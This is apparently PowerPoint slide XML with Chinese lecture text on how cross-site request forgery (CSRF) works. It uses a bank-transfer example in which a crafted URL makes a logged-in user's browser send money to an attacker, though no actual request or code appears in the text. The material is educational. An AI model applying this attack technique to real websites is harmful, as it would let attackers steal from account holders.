            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>性</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>可以这么理解</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击：某甲是某网站的合法用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>某攻击者盗用了某甲的身份， </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>以某甲的名义向服务器提交某些非法操</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>作</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，而对服务器而言，这些请求操作都是</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="95885">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>合法</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的攻击者能够使用网站合法用户的账户发送邮</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>件</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、获取被攻击者的 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>敏感信息、甚至盗走被攻击者的财</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>产</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621993"/>
            <a:ext cx="117221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CSR</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击原理</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2531248" y="2009756"/>
            <a:ext cx="2110105" cy="113030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="3175" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>数与</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>money</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>参数，即可完成一次“合法”的攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>如下面</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1722021" y="2381616"/>
            <a:ext cx="2914650" cy="113030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="3175" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ser1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>访问了攻击者伪造的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>后，就会自动向</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>hack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的账户中转入</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>10000</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>元。而</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262767" y="871890"/>
            <a:ext cx="3410585" cy="1800225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="28575" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" marR="13335" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="88200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>当用户打开或登录某个网站时，浏览器与网站服务器之间将会产生一个会话，在这个 会话没有结束时，用户都可以利用自己的权限对网站进行某些操作。而</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击正好 是建立在会话之上的。当用户登录了网上银行正进行转账业务时，恰好此用户的某个 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>好友（攻击者）发来一条消息</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>），</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>而这条消息其实是攻击者精心构造的转账 业务代码，且与用户正登录的是同一家网络银行，用户可能认为这个网站是安全的，  然而当用户打开了这条</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>后，可能银行账户中的余额会被盗。</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="151130" marR="14604" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="88100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>这是为什么呢？原因是此时浏览器正处在与网银网站的会话之中</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>用户发来的所有请求 都是合法的，而攻击者构造的这段代码正是以伪造的用户身份向服务器发送的转账操 作请求，这在服务器看来也是正常的。</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="680"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>例如，当用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>user1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>想给用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>xxser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>转账</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>元，那么当</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>user1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>单击提交按钮后，可能会 向网银服务器发送如下请求：</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="2133600" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="690"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>而攻击者仅需改变一下</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>us</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>参 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的代码：</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="191B0E"/>
              </a:buClr>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:endParaRPr sz="1250">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="735"/>
              </a:lnSpc>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>当用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="45720" indent="-635">
              <a:lnSpc>
                <a:spcPts val="680"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="60"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>这个转账对服务器来说是用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>user1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>亲手转的，用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>user1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的账户和密码并没有破解，  银行的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
